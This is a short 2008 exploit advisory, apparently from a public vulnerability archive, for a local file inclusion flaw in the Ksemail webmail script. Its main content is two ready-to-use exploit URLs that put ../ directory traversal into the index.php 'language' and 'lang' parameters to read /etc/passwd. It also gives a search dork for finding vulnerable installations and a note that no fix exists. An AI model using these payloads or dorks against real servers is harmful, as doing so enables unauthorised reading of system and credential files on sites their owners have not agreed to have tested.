Ksemail (index.php language) Local File Inclusion Vulnerability

2008-04-10 00:00:00

:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discoverd by dun \ dun[at]strcpy.eu ]

#####################################################
# [ Ksemail ] Local File Include Vulnerability #
#####################################################
#
# Script site: http://www.ksemail.com/, http://mail.ksemail.com
#
# Vuln:
# http://site.com/prog/index.php?language=../../../../../../etc/passwd
# http://site.com/prog/index.php?lang=../../../../../../etc/passwd
#
# Dork example: "FoxMail/Outook"
#
###############################################
# Greetz: D3m0n_DE, nejman, sid_psycho
# and all otherz.. [;
###############################################

[ dun / 2008 ]

********************************************************************************************

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.